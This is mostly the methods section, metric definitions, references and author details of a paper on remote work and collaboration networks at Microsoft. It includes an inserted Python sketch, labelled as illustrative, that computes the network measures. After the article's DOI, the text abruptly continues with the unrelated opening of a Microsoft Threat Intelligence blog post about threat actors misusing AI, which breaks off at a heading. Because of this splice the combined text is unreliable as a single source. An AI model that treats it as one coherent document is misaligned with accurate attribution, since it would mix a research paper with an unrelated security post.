Our research is not without its limitations. First, our study characterizes the impacts of firm-wide remote work on the US employees of one major technology firm. Although we expect our results to generalize to other technology firms, this may not be the case. Caution should also be exercised in generalizing our results to other sectors and other countries. Second, the period of time over which we measured the causal effects of remote work is quite short (three months), and it is possible that the long-term effects of firm-wide remote work are different. For example, at the beginning of the pandemic, workers were able to leverage existing network connections, many of which were built in person. This may not be possible if firm-wide remote work were implemented long-term. Third, our analysis treats the effects of firm-wide remote work on people’s collaboration networks and communication media usage as separate, whereas these two types of effects may interact and exacerbate one another. Fourth, although we believe that changes to workers’ communication networks and media will affect productivity and innovation, we were unable to measure these outcomes directly. Even if we were able to measure productivity and innovation, the impacts of network structure and communication media choice on performance are likely contingent on a number of factors, including the type of task a given team/organization is trying to complete 56 , 57 , 58 , 59 . Finally, our ability to make causal claims is predicated on the validity of our modified DiD framework’s identifying assumptions: parallel trends, conditional exogeneity after matching and additively separable effects. Although we have taken steps to verify the plausibility of these assumptions and tested the robustness of our results to an alternative matching procedure 60 (details of which are provided in the Methods ), they are assumptions nonetheless.

There are multiple high-profile cases of firms such as IBM and Yahoo! enacting, but ultimately rescinding, flexible remote work policies before COVID-19, presumably due to the impacts of these policies on communication and collaboration 61 , 62 . On the basis of these examples, one might conclude that the current enthusiasm for remote work may not ultimately translate into a long-lasting shift to remote work for the majority of firms. However, during the COVID-19 pandemic, workers and firms have invested in the physical and human capital required to support remote work 63 and innovation has shifted toward new technologies that support remote work 64 . Both of these factors make it more likely that for many firms, some version of remote work will persist beyond the pandemic. In light of this fact, the importance of deepening our understanding of remote work and its impacts has never been greater.

Ethical review

This research was reviewed and classified as exempt by the Massachusetts Institute of Technology (MIT) Committee on the Use of Humans as Experimental Subjects (that is, MIT’s Institutional Review Board), because the research was secondary use research involving the use of de-identified data.

Our data were passively collected and anonymized by Microsoft’s Workplace Analytics product 65 , which logs activity that takes place in employees’ work email accounts and in Microsoft Teams using de-identified IDs. Microsoft Teams is collaboration software that enables employees to video/audio call, video/audio teleconference, IM and share files. The use of the data is compliant with US employee privacy laws. Employee privacy restrictions in many countries prevent us from reporting on workers outside the US. However, an employee’s communication and collaboration with international coworkers is still included in the data and those employees are still counted as part of each employee’s network. No information on international coworkers except for counting interactions with US employees was obtained for research purposes or analysed. Microsoft provides employees with appropriate notice of its use of Workplace Analytics, and sets strict controls over the collection and use of such data.

In our collaboration network, each worker is a node. For a tie to exist between two workers in a given month, those two workers must have had at least one meaningful interaction through two out of the following four communication media: email, IM, scheduled meeting and unscheduled video/audio call. A meaningful interaction is an email, IM, scheduled meeting or unscheduled video/audio call with a group of size no more than eight.

In our analysis, we classify a worker as working remotely if more than 80% of their collaboration hours in a given month are with colleagues remote to them. For employees WFH, all of their colleagues are considered to be remote from them, whereas, for those in an office, colleagues are remote to them if those colleagues are WFH or are located on a Microsoft campus in a different city. After March 2020, all US Microsoft employees are by definition working remotely, as they are WFH.

Modified DiD model

Our modified DiD model extends the standard DiD model in two ways. First, rather than measuring the effect of changes in one treatment variable, our model measures the effects of changes in two different treatment variables—(1) whether an employee is working remotely and (2) whether that employee’s colleagues are working remotely—and assumes that these two effects are additively separable. Second, our model allows the variation in our treatment variables to be induced by one exogenous shock that affects all workers in our sample, but affects some workers differently compared with others. More specifically, although all Microsoft employees were affected by COVID-19, only some employees experienced changes in their remote work status and/or the share of their collaborators that were working remotely due to Microsoft’s company-wide WFH mandate during the pandemic.

We estimate the average treatment effect for the treated (ATT) of ego remote work and collaborator remote work on all outcome measures using the following specification:

where \(Y_{it}\) denotes the work outcome, \(\alpha_{i}\) is an employee fixed-effect, \(\tau_{t}\) is a month fixed effect, \(D_{it}\) indicates whether employee i was a treated employee forced to work remotely in month t, \(s_{it}\) is the share of employee i’s coworkers who were working remotely in month t and \(\epsilon_{it}\) denotes the error term. Observations are weighted using coarsened exact matching (CEM) weights, and standard errors are clustered at the level of an employee’s manager. We estimate this model using data from February, April, May and June 2020. We omitted March because workers were transitioning from office work to WFH beginning in the first week of the month.

Our ability to causally identify both ATTs is predicated on a number of identifying assumptions, some of which are standard in DiD analyses and some of which are specific to our research setting. First, we assume that, for both of our ‘treatment’ variables, the time series for ‘treated’ and ‘untreated’ workers would have evolved in parallel absent the treatment. Time-series trends for different subsets of the matched sample are compared in Fig. 1 . These comparisons suggest that, for both of our treatment variables, the DiD model’s parallel trends assumption is plausible, both when measuring the effect of the treatment on network measures (Fig. 1a,c ) and when measuring the effect of the treatment on communication media measures (Figs. 1b,d ). Analogous figures for our full set of outcome variables are provided in Supplementary Figs. 5 – 19 . In all cases, the time series appear to move in parallel both before the transition to remote work, and once the transition to remote work concluded, suggesting that this identifying assumption is reasonable.

Second, we assume strict exogeneity, that is, that the timing of the switch to remote work must be independent of employees’ outcomes. As the ‘treatment group’ was all switched to WFH due to COVID-19, we are less concerned about endogeneity of treatment than we might be in other settings. However, we do need to assume that workers’ remote work status before the pandemic and the percentage of workers’ colleagues that work remotely before the pandemic are independent of how they are affected by the pandemic. This assumption would be violated if, for example, those who worked remotely before the pandemic were less likely to have unforeseen childcare responsibilities from school closures caused by the pandemic. To make this identifying assumption more plausible, we use the CEM procedure described below. If we wanted to interpret the ATTs that we estimate from those employees that started WFH due to the pandemic as average treatment effects, we would also need to assume that, conditional on the CEM procedure described below, employees’ pre-pandemic remote work status and the percentage of colleagues working remotely were independent of the effects of ego remote work and collaborator remote work on their work outcomes.

Finally, we assume that ego remote work effects, collaborator remote work effects and non-remote-work-related COVID-19 effects are additively separable. More precisely, we assume that \(Y_{it}\) can be written as

where \(\mathrm{RW}_{it}\) is a binary variable that indicates whether employee i is working remotely at time t, \(s_{it}\) is the share of employee i’s collaborators working remotely in month t, \(C_{it}\) is a binary variable indicating whether employee i was subject to the COVID-19 pandemic at time t and \(Y_{it}(0, 0, 0)\) is worker i’s outcome at time t if all three variables were equal to 0. This assumption is an extension of the standard DiD assumption that treatment effects, cross-group differences and time-effects are additively separable and would be violated if, for example, the effects of ego remote work and/or collaborator remote work were amplified in a multiplicative manner due to other aspects of the COVID-19 pandemic (for example, childcare responsibilities or pandemic-induced changes to Microsoft’s product roadmaps). With our data, we are unable to validate the plausibility of this important identifying assumption; however, it is worth noting that causal estimates produced by standard DiD models also rely on the validity of parametric assumptions 66 .

The results from our modified DiD specification for the full set of outcomes are provided in Supplementary Tables 1 – 3 . Throughout the main text, we refer to results as insignificant when two-sided P  >0.05.

We make our results more robust by estimating our DiD model using weights generated using CEM 67 . This reweighting means that we can relax the parallel trends and exogeneity assumptions described above to only be required conditional on employee characteristics. In other words, provided that any differences in how the two groups would have evolved in the absence of the pandemic or how they are affected by the pandemic are entirely explained by the employee characteristics we match on, then the CEM-based results are valid.

The CEM procedure works as follows. Each US Microsoft employee is assigned to a stratum on the basis of their role, managerial status, seniority level and tenure at Microsoft as of February 2020. For each employee i in a stratum s that contains a mixture of employees that were and were not remote before the COVID-19 pandemic, we construct a CEM weight according to the following formula:

where \(n_{O}\) (\(n_{R}\)) is the total number of non-remote (remote) employees before the COVID-19 pandemic, \(n_{O}^{s}\) (\(n_{R}^{s}\)) is the total number of non-remote (remote) employees before the COVID-19 pandemic in stratum s and \(O^{s}\) (\(R^{s}\)) is the set of non-remote (remote) employees before the COVID-19 pandemic in stratum s. The 97 (<0.2%) employees in strata without both non-remote and remote employees before the COVID-19 pandemic were discarded from our sample. The final remote:non-remote sample ratio is 1:4.6.

Treatment effect heterogeneity

We measured treatment effect heterogeneity with respect to tenure at Microsoft (shorter tenure versus longer tenure), managerial status (manager versus individual contributor) and role type (engineering versus non-engineering). To do so, we estimated the DiD model separately for each subgroup. Our treatment effect estimates for each combination of outcome and subgroup are provided in Supplementary Tables 4 – 23 .

Alternative matching procedure

To test the robustness of our analysis, we re-estimate our main DiD specification on an alternate matched sample of employees who worked remotely before the COVID-19 pandemic, which is constructed using a more extensive matching procedure introduced in ref. 60 . In this matching procedure, we augment the set of observables that we match on to include not only time-invariant employee attributes (that is, role, managerial status, seniority and new-hire status as of February), but also time-varying behavioural attributes (that is, number of scheduled meeting hours, unscheduled call hours, IMs sent, emails sent, workweek hours, network ties, business groups connected to, cross-group connections, bridging ties, churned ties and added ties, share of time with cross-group ties, bridging ties, weak ties and added ties, and the individual clustering coefficient) as measured in June 2020. As we are matching on many more variables, there are more employees who cannot be matched, and our matched sample includes only 43,576 employees.

The motivation for this matching procedure is as follows. In a standard matched DiD analysis, control and treatment units would be matched on the basis of pretreatment behaviour. This type of matching is not appropriate in our context, given that employees who did and did not work remotely before the COVID-19 pandemic are by definition in different potential outcome states in February. Assuming that there is a treatment effect to detect, matching on pretreatment behavioural outcomes would actually make our identifying assumptions less likely to hold. However, in June 2020, both employees who were and were not working remotely before the COVID-19 pandemic were in the same potential outcome state (firm-wide remote work), and therefore matching on time-varying behavioural outcomes improves the credibility of our identifying assumptions.

Supplementary Figs. 20 and 21 show the results of our DiD model as estimated on this alternative sample. The results are qualitatively similar to those we present in our main analysis.

Collaboration network outcome definitions

Number of connections: The number of people with whom one had a meaningful interaction through at least two out of four possible communication media (email, IM, scheduled meeting and unscheduled video/audio call) in a given month. A meaningful interaction is an email, meeting, video/audio call or IM with a group of size no more than eight.

Number of business groups and cross-group connections: A business group is a collection of typically fewer than ten employees who report to the same manager and share a common purpose. We look at the number of distinct business groups that one’s immediate collaborators belong to, and the number of one’s collaborators that belong to a different business group than one’s own.

Bridging connections: Bridging connections are connections with a low value of the local constraint 9,18,42 in that period. To calculate the local constraint, we first calculate the normalized mutual weight, \(\mathrm{NMW}_{ijt}\), between each pair of people \(i\) and \(j\) in each period \(t\). If there is no connection between \(i\) and \(j\) in period \(t\), then \(\mathrm{NMW}_{ijt}=0\), otherwise \(\mathrm{NMW}_{ijt}=\frac{2}{n_{it}+n_{jt}}\), where \(n_{it}\) is the number of connections \(i\) has in period \(t\). Then, for each \(i\), \(j\), \(t\), we calculate the local constraint \(\mathrm{LC}_{ijt}=\mathrm{NMW}_{ijt}+\sum_{k}\mathrm{NMW}_{ikt}\times\mathrm{NMW}_{kjt}\). We define a global cut-off \(\widehat{\mathrm{LC}}\) on the basis of the median value of the constraint across all directed ties in February and categorize a connection as bridging if its local constraint is below that cut-off. We calculate the local constraint for each tie using the matricial formulae described in ref. 68.

Individual clustering coefficient: The number of triads (group of three people who are all connected to each other) a person is a part of as a share of the number of triads they could possibly be part of given their degree. If \(a_{ijt}\) is a dummy that equals 1 if and only if there is a connection between \(i\) and \(j\) in period \(t\) and \(n_{it}\) is the number of connections \(i\) has in period \(t\), then individual \(i\)’s clustering coefficient in period \(t\) is \(\mathrm{CC}_{it}=\frac{2}{n_{it}(n_{it}-1)}\sum_{j,k}a_{ijt}\times a_{jkt}\times a_{kit}\).

Number of churned connections: The number of people with whom a worker had a connection in month \(t-1\), but does not have a connection in month \(t\).

Number of added connections: The number of people with whom a worker has a connection in month \(t\), but did not have a connection in month \(t-1\).

Distribution of collaboration time: In addition to unweighted network ties, we also measured the share of collaboration time that an individual spent with each of their collaborators. The number of collaboration hours is calculated by summing up the number of hours spent communicating by email or IM, in meetings and in video/audio calls. If \(h_{ijt}\) is the number of hours that individual \(i\) spent with collaborator \(j\) in month \(t\), then the share of collaboration time \(i\) spent with \(j\) is \(P_{ijt}=\frac{h_{ijt}}{\sum_{k}h_{ikt}}\), from which we can define the following metrics:

Share of time with own-group connections: The share of time spent with collaborators in the same business group (see the above definition), \(\mathrm{SG}_{it}=\sum_{j\mid g_{j}=g_{i}}P_{ijt}\), where \(g_{i}\) is the business group that individual \(i\) belongs to.

Share of time with bridging connections: The share of collaboration time spent with collaborators with whom the local constraint (as defined under ‘bridging connections’) is below the February median, \(\mathrm{BC}_{it}=\sum_{j\mid \mathrm{LC}_{ijt}<\widehat{\mathrm{LC}}}P_{ijt}\).

Share of time with weak ties: The share of a person’s collaboration hours spent with the half of the people that they collaborate with the least during month \(t\), \(\mathrm{ST}_{it}=\sum_{j\mid P_{ijt}<P_{it}^{m}}P_{ijt}\), where \(P_{it}^{m}\) is the time that \(i\) spends with their median connection in period \(t\). We do not analyse the number of weak ties a person has in a given month as, by this definition, it is equal to half the number of ties they have in that month.

Share of time with added connections: The share of a person’s collaboration hours spent with people with whom they did not have a connection in the previous month, \(\mathrm{SA}_{it}=\sum_{j\notin n_{i,t-1}}P_{ijt}\), where \(n_{i,t-1}\) is the set of \(i\)’s collaborators in period \(t-1\).

Entropy of an individual’s collaboration time (network entropy): The entropy 48 of the distribution of the hours spent with one’s collaborators, \(E_{it}=-\sum_{j}P_{ijt}\times\log P_{ijt}\).

Concentration of an individual’s collaboration time: A normalized version of the HHI 47 of the hours spent with one’s collaborators, \(\mathrm{HHI}_{it}=\frac{1}{n_{it}-1}\left(n_{it}\times\sum_{j}P_{ijt}^{2}-1\right)\), where \(n_{it}\) is the number of \(i\)’s collaborators in period \(t\). The normalization ensures that \(\mathrm{HHI}_{it}\) always falls between 0 and 1.
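The definitions above, from bridging connections through concentration of collaboration time, can be checked on a small graph. The following Python sketch is an added example, not the authors' code: the ties, business groups and hours are constructed, the function names are hypothetical, the constructed month stands in for the February baseline, and the local constraint is computed with direct loops rather than the matricial formulae of ref. 68. It assumes the natural logarithm for the entropy, counts each unordered pair of neighbours once in the clustering coefficient (as in the textual definition), and returns 0 for the clustering coefficient and 1 for the HHI when a person has fewer than two connections.

```python
import math
from statistics import median

# Constructed sample (not data from the study): undirected ties in one month,
# business groups, and hours h_ijt that ego "c" spent with each collaborator.
TIES = [("a", "b"), ("a", "c"), ("b", "c"), ("c", "d"), ("d", "e")]
GROUP = {"a": "g1", "b": "g1", "c": "g1", "d": "g2", "e": "g2"}
HOURS_C = {"a": 6.0, "b": 3.0, "d": 1.0}


def adjacency(ties):
    """Build the neighbour sets; len(adj[i]) is n_it."""
    adj = {}
    for i, j in ties:
        adj.setdefault(i, set()).add(j)
        adj.setdefault(j, set()).add(i)
    return adj


def nmw(adj, i, j):
    """NMW_ijt = 2 / (n_it + n_jt) if i and j are connected, else 0."""
    if j not in adj.get(i, set()):
        return 0.0
    return 2.0 / (len(adj[i]) + len(adj[j]))


def local_constraint(adj, i, j):
    """LC_ijt = NMW_ijt + sum_k NMW_ikt * NMW_kjt.

    Only k in i's neighbourhood can contribute; k == j adds 0 because
    nobody is connected to themselves.
    """
    indirect = sum(nmw(adj, i, k) * nmw(adj, k, j) for k in adj[i])
    return nmw(adj, i, j) + indirect


def bridging_cutoff(adj):
    """Median LC over all directed ties of the baseline period."""
    return median(local_constraint(adj, i, j) for i in adj for j in adj[i])


def clustering(adj, i):
    """Closed triads around i as a share of the n(n-1)/2 possible ones."""
    n = len(adj[i])
    if n < 2:
        return 0.0  # assumption: undefined case reported as 0
    nbrs = sorted(adj[i])
    closed = sum(
        1
        for pos, j in enumerate(nbrs)
        for k in nbrs[pos + 1:]  # each unordered pair {j, k} once
        if k in adj[j]
    )
    return 2.0 * closed / (n * (n - 1))


def time_metrics(ego, hours, adj, group, cutoff):
    """Shares of collaboration time, entropy and normalized HHI for one ego."""
    total = sum(hours.values())
    p = {j: h / total for j, h in hours.items()}  # P_ijt
    n = len(p)
    p_med = median(p.values())  # P^m_it
    return {
        "own_group": sum(v for j, v in p.items() if group[j] == group[ego]),
        "bridging": sum(
            v for j, v in p.items() if local_constraint(adj, ego, j) < cutoff
        ),
        "weak": sum(v for v in p.values() if v < p_med),
        "entropy": -sum(v * math.log(v) for v in p.values() if v > 0),
        # assumption: a single collaborator is reported as fully concentrated
        "hhi": (n * sum(v * v for v in p.values()) - 1) / (n - 1) if n > 1 else 1.0,
    }


if __name__ == "__main__":
    adj = adjacency(TIES)
    cutoff = bridging_cutoff(adj)
    print("cut-off:", cutoff)
    print("clustering(c):", clustering(adj, "c"))
    print(time_metrics("c", HOURS_C, adj, GROUP, cutoff))
```

In this sample the only bridging tie is c–d: it is the one tie whose endpoints share no common neighbour, so its local constraint falls below the median.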

Communication media outcome definitions

Scheduled meeting hours: The number of hours that a person spent in meetings scheduled through Teams or Outlook calendar with at least one other person. Before firm-wide remote work, employees were able to participate in meetings both in-person and by video/audio call. After the shift to firm-wide remote work, all meetings take place entirely by video/audio call.

Unscheduled call hours: The number of hours a person spent in unscheduled video/audio calls through Microsoft Teams with at least one other person.

Emails sent: The number of emails a person sent through their work email account.

IMs sent: The number of IMs a person sent through Microsoft Teams.

Workweek hours: The sum across every day in the workweek of the time between a person’s first sent email or IM, scheduled meeting or Microsoft Teams video/audio call, and the last sent email or IM, scheduled meeting or Microsoft Teams video/audio call. A day is part of the workweek if it is a ‘working day’ for a given employee based on their work calendar.

Reporting Summary

Further information on research design is available in the Nature Research Reporting Summary linked to this article.

Data availability

An anonymized version of the data supporting this study is retained indefinitely for scientific and academic purposes. The data are not publicly available due to employee privacy and other legal restrictions. The data are available from the authors on reasonable request and with permission from Microsoft Corporation.

Code availability

The code supporting this study is retained indefinitely for scientific and academic purposes. The code is not publicly available due to employee privacy and other legal restrictions. The code is available from the authors on reasonable request and with permission from Microsoft Corporation.

Change history

05 October 2021

A Correction to this paper has been published: https://doi.org/10.1038/s41562-021-01228-z

Bloom, N. A. Working From Home and the Future of U.S. Economic Growth Under COVID (2020); https://www.youtube.com/watch?v=jtdFIZx3hyk

Brynjolfsson, E. et al. COVID-19 and Remote Work: An Early Look at US Data. Technical Report (National Bureau of Economic Research, 2020).

Barrero, J. M., Bloom, N. & Davis, S. 60 million fewer commuting hours per day: how Americans use time saved by working from home. Working Paper (Univ. Chicago Becker Friedman Institute for Economics, 2020); https://bfi.uchicago.edu/wp-content/uploads/2020/09/BFI_WP_2020132.pdf

Dingel, J. I. & Neiman, B. How many jobs can be done at home? J. Public Econ. 189, 104235 (2020).

Benveniste, A. These companies’ workers may never go back to the office. CNN (18 October 2020); https://cnn.it/3jIobzJ

McLean, R. These companies plan to make working from home the new normal. As in forever. CNN (25 June 2020); https://cnn.it/3ebJU27

Lund, S., Cheng, W.-L., André Dua, A. D. S., Robinson, O. & Sanghvi, S. What 800 executives envision for the postpandemic workforce. McKinsey Global Institute (23 September 2020); https://www.mckinsey.com/featured-insights/future-of-work/what-800-executives-envision-for-the-postpandemic-workforce

Granovetter, M. The strength of weak ties. Am. J. Sociol. 78, 1360–1380 (1973).

Burt, R. S. Structural holes and good ideas. Am. J. Sociol. 110, 349–399 (2004).

Reagans, R. & McEvily, B. Network structure and knowledge transfer: the effects of cohesion and range. Admin. Sci. Q. 48, 240–267 (2003).

Uzzi, B. & Spiro, J. Collaboration and creativity: the small world problem. Am. J. Sociol. 111, 447–504 (2005).

Argote, L. & Ingram, P. Knowledge transfer: a basis for competitive advantage in firms. Organ. Behav. Hum. Dec. Process. 82, 150–169 (2000).

Hansen, M. T. The search-transfer problem: the role of weak ties in sharing knowledge across organization subunits. Admin. Sci. Q. 44, 82–111 (1999).

Krackhardt, D. The strength of strong ties. in Networks in the Knowledge Economy (Oxford Univ. Press, 2003).

Levin, D. Z. & Cross, R. The strength of weak ties you can trust: the mediating role of trust in effective knowledge transfer. Manage. Sci. 50, 1477–1490 (2004).

McFadyen, M. A. & Cannella Jr, A. A. Social capital and knowledge creation: diminishing returns of the number and strength of exchange relationships. Acad. Manage. J. 47, 735–746 (2004).

Granovetter, M. The strength of weak ties: a network theory revisited. in Social Structure and Network Analysis 105–130 (Sage, 1982).

Burt, R. S. Structural Holes: The Social Structure of Competition (Harvard Univ. Press, 2009).

Baum, J. A., McEvily, B. & Rowley, T. J. Better with age? Tie longevity and the performance implications of bridging and closure. Organ. Sci. 23, 529–546 (2012).

Kneeland, M. K. Network Churn: A Theoretical and Empirical Consideration of a Dynamic Process on Performance. PhD thesis, New York University (2019).

Kumar, P. & Zaheer, A. Ego-network stability and innovation in alliances. Acad. Manage. J. 62, 691–716 (2019).

Burt, R. S. & Merluzzi, J. Network oscillation. Acad. Manage. Discov. 2, 368–391 (2016).

Soda, G. B., Mannucci, P. V. & Burt, R. Networks, creativity, and time: staying creative through brokerage and network rejuvenation. Acad. Manage. J. https://doi.org/10.5465/amj.2019.1209 (2021).

Zeng, A., Fan, Y., Di, Z., Wang, Y. & Havlin, S. Fresh teams are associated with original and multidisciplinary research. Nat. Hum. Behav. https://doi.org/10.1038/s41562-021-01084-x (2021).

Levin, D. Z., Walter, J. & Murnighan, J. K. Dormant ties: the value of reconnecting. Organ. Sci. 22, 923–939 (2011).

Lengel, R. H. & Daft, R. L. An Exploratory Analysis of the Relationship Between Media Richness and Managerial Information Processing. Technical Report (Texas A&M Univ. Department of Management, 1984).

Daft, R. L. & Lengel, R. H. Organizational information requirements, media richness and structural design. Manage. Sci. 32, 554–571 (1986).

Dennis, A. R., Fuller, R. M. & Valacich, J. S. Media, tasks, and communication processes: a theory of media synchronicity. MIS Q. 32, 575–600 (2008).

Morris, M., Nadler, J., Kurtzberg, T. & Thompson, L. Schmooze or lose: social friction and lubrication in e-mail negotiations. Group Dyn. Theor. Res. Pract. 6, 89–100 (2002).

Pentland, A. The new science of building great teams. Harvard Bus. Rev. 90, 60–69 (2012).

Allen, T. D., Golden, T. D. & Shockley, K. M. How effective is telecommuting? Assessing the status of our scientific findings. Psychol. Sci. Publ. Int. 16, 40–68 (2015).

Ahuja, M. K. & Carley, K. M. Network structure in virtual organizations. Organ. Sci. 10, 741–757 (1999).

Ahuja, M. K., Galletta, D. F. & Carley, K. M. Individual centrality and performance in virtual R&D groups: an empirical study. Manage. Sci. 49, 21–38 (2003).

Suh, A., Shin, K.-s, Ahuja, M. & Kim, M. S. The influence of virtuality on social networks within and across work groups: a multilevel approach. J. Manage. Inform. Syst. 28, 351–386 (2011).

DeFilippis, E., Impink, S., Singell, M., Polzer, J. T. & Sadun, R. Collaborating During Coronavirus: The Impact of COVID-19 on the Nature of Work. Working Paper 21-006 (Harvard Business School Organizational Behavior Unit, 2020).

Bernstein, E., Blunden, H., Brodsky, A., Sohn, W. & Waber, B. The implications of working without an office. Harvard Business Review (15 July 2020); https://hbr.org/2020/07/the-implications-of-working-without-an-office

Larson, J. et al. Dynamic silos: modularity in intra-organizational communication networks before and during the COVID-19 pandemic. Preprint at https://arxiv.org/abs/2104.00641 (2021).

Bloom, N., Liang, J., Roberts, J. & Ying, Z. J. Does working from home work? Evidence from a Chinese experiment. Q. J. Econ. 130, 165–218 (2015).

Choudhury, P., Foroughi, C. & Larson, B. Z. Work-from-anywhere: the productivity effects of geographic flexibility. Acad. Manage. Proc. 2020, 21199 (2020).

Kleinbaum, A. M., Stuart, T. & Tushman, M. Communication (and Coordination?) in a Modern, Complex Organization (Harvard Business School, 2008).

McEvily, B., Soda, G. & Tortoriello, M. More formally: rediscovering the missing link between formal organization and informal social structure. Acad. Manage. Ann. 8, 299–345 (2014).

Everett, M. G. & Borgatti, S. P. Unpacking Burt’s constraint measure. Social Netw. 62, 50–57 (2020).

Onnela, J.-P. et al. Structure and tie strengths in mobile communication networks. Proc. Natl Acad. Sci. USA 104, 7332–7336 (2007).

Aral, S. & Van Alstyne, M. The diversity-bandwidth trade-off. Am. J. Sociol. 117, 90–171 (2011).

Brashears, M. E. & Quintane, E. The weakness of tie strength. Social Netw. 55, 104–115 (2018).

Burke, M. & Kraut, R. E. Growing closer on Facebook: changes in tie strength through social network site use. In Proc. SIGCHI Conference on Human Factors in Computing Systems 4187–4196 (ACM, 2014); https://dl.acm.org/doi/10.1145/2556288.2557094

Herfindahl, O. C. Concentration in the Steel Industry. PhD thesis, Columbia University (1950).

Shannon, C. E. A mathematical theory of communication. Bell Syst. Tech. J. 27, 379–423 (1948).

Herbsleb, J. D. & Mockus, A. An empirical study of speed and communication in globally distributed software development. IEEE Trans. Softw. Eng. 29, 481–494 (2003).

Ehrlich, K. & Cataldo, M. All-for-one and one-for-all? A multi-level analysis of communication patterns and individual performance in geographically distributed software development. In Proc. ACM 2012 Conf. Computer Supported Cooperative Work 945–954 (ACM, 2012); https://doi.org/10.1145/2145204.2145345

Cataldo, M. & Herbsleb, J. D. Communication networks in geographically distributed software development. In Proc. 2008 ACM Conf. Computer Supported Cooperative Work 579–588 (ACM, 2008).

Kolko, J. Remote job postings double during coronavirus and keep rising. Indeed Hiring Lab (16 March 2021); https://www.hiringlab.org/2021/03/16/remote-job-postings-double/

Ugander, J., Karrer, B., Backstrom, L. & Kleinberg, J. Graph cluster randomization: network exposure to multiple universes. In Proc. 19th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining 329–337 (2013); https://doi.org/10.1145/2487575.2487695

Eckles, D., Karrer, B. & Ugander, J. Design and analysis of experiments in networks: reducing bias from interference. J. Causal Inference https://doi.org/10.1515/jci-2015-0021 (2016).

Bojinov, I., Simchi-Levi, D. & Zhao, J. Design and analysis of switchback experiments. Preprint at SSRN https://doi.org/10.2139/ssrn.3684168 (2020).

Lechner, C., Frankenberger, K. & Floyd, S. W. Task contingencies in the curvilinear relationships between intergroup networks and initiative performance. Acad. Manage. J. 53, 865–889 (2010).

Chung, Y. & Jackson, S. E. The internal and external networks of knowledge-intensive teams: the role of task routineness. J. Manage. 39, 442–468 (2013).

Dennis, A. R., Wixom, B. H. & Vandenberg, R. J. Understanding fit and appropriation effects in group support systems via meta-analysis. MIS Q. 25, 167–193 (2001).

Fuller, R. M. & Dennis, A. R. Does fit matter? The impact of task-technology fit and appropriation on team performance in repeated tasks. Inform. Syst. Res. 20, 2–17 (2009).

Athey, S., Mobius, M. M. & Pál, J. The impact of aggregators on Internet news consumption. Preprint at SSRN https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2897960 (2017).

Swisher, K. Physically together: here’s the internal Yahoo no-work-from-home memo for remote workers and maybe more. All Things (22 February 2013).

Simons, J. IBM, a pioneer of remote work, calls workers back to the office. Wall Street Journal (18 May 2017).

Barrero, J. M., Bloom, N. & Davis, S. J. Why working from home will stick. Working Paper (Univ. Chicago, Becker Friedman Institute for Economics, 2020).

Bloom, N., Davis, S. J. & Zhestkova, Y. COVID-19 shifted patent applications toward technologies that support working from home. Working Paper (Univ. Chicago, Becker Friedman Institute for Economics, 2020).

Workplace Analytics https://docs.microsoft.com/en-us/workplace-analytics/use/metric-definitions (Microsoft, 2021).

Athey, S. & Imbens, G. W. Identification and inference in nonlinear difference-in-differences models. Econometrica 74, 431–497 (2006).

Iacus, S. M., King, G. & Porro, G. Causal inference without balance checking: coarsened exact matching. Polit. Anal. 20, 1–24 (2012).

Muscillo, A. A note on (matricial and fast) ways to compute Burt’s structural holes. Preprint at https://arxiv.org/abs/2102.05114 (2021).

Acknowledgements

This work was a part of Microsoft’s New Future of Work Initiative. We thank D. Eckles for assistance; N. Baym for illuminating discussions regarding social capital; and the attendees of the Berkeley Haas MORS Macro Research Lunch and the organizers and attendees of the NYU Stern Future of Work seminar for their comments and feedback. The authors received no specific funding for this work.

Author information

Authors and affiliations.

Microsoft Corporation, Redmond, WA, USA

Longqi Yang, Sonia Jaffe, Siddharth Suri, Shilpi Sinha, Jeffrey Weston, Connor Joyce, Neha Shah, Kevin Sherman, Brent Hecht & Jaime Teevan

Haas School of Business, University of California, Berkeley, CA, USA

David Holtz

MIT Initiative on the Digital Economy, Cambridge, MA, USA

Contributions

L.Y. analysed the data. L.Y., D.H., S.J. and S. Suri performed the research design, interpretation and writing. S. Sinha, J.W., C.J., N.S. and K.S. provided data access and expertise. B.H. and J.T. advised and sponsored the project.

Corresponding author

Correspondence to Longqi Yang.

Ethics declarations

Competing interests.

L.Y., S.J., S. Suri, S. Sinha, J.W., C.J., N.S., K.S., B.H. and J.T. are employees of and have a financial interest in Microsoft. D.H. was previously a Microsoft intern. All of the authors are listed as inventors on a pending patent application by Microsoft Corporation (16/942,375) related to this work.

Additional information

Peer review information Nature Human Behaviour thanks Nick Bloom, Yvette Blount and Sandy Staples for their contribution to the peer review of this work. Peer reviewer reports are available.

Publisher’s note Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Supplementary information

Supplementary Figs. 1–21 and Supplementary Tables 1–25.

About this article

Cite this article.

Yang, L., Holtz, D., Jaffe, S. et al. The effects of remote work on collaboration among information workers. Nat Hum Behav 6, 43–54 (2022). https://doi.org/10.1038/s41562-021-01196-4

Received: 02 November 2020

Accepted: 16 August 2021

Published: 09 September 2021

Issue Date: January 2022

DOI: https://doi.org/10.1038/s41562-021-01196-4


Staying ahead of threat actors in the age of AI

By Microsoft Threat Intelligence

Over the last year, the speed, scale, and sophistication of attacks have increased alongside the rapid development and adoption of AI. Defenders are only beginning to recognize and apply the power of generative AI to shift the cybersecurity balance in their favor and keep ahead of adversaries. At the same time, it is also important for us to understand how AI can be potentially misused in the hands of threat actors. In collaboration with OpenAI, today we are publishing research on emerging threats in the age of AI, focusing on identified activity associated with known threat actors, including prompt-injections, attempted misuse of large language models (LLM), and fraud. Our analysis of the current use of LLM technology by threat actors revealed behaviors consistent with attackers using AI as another productivity tool on the offensive landscape. You can read OpenAI’s blog on the research here. Microsoft and OpenAI have not yet observed particularly novel or unique AI-enabled attack or abuse techniques resulting from threat actors’ usage of AI. However, Microsoft and our partners continue to study this landscape closely.

The objective of Microsoft’s partnership with OpenAI, including the release of this research, is to ensure the safe and responsible use of AI technologies like ChatGPT, upholding the highest standards of ethical application to protect the community from potential misuse. As part of this commitment, we have taken measures to disrupt assets and accounts associated with threat actors, improve the protection of OpenAI LLM technology and users from attack or abuse, and shape the guardrails and safety mechanisms around our models. In addition, we are also deeply committed to using generative AI to disrupt threat actors and leverage the power of new tools, including Microsoft Copilot for Security, to elevate defenders everywhere.

A principled approach to detecting and blocking threat actors

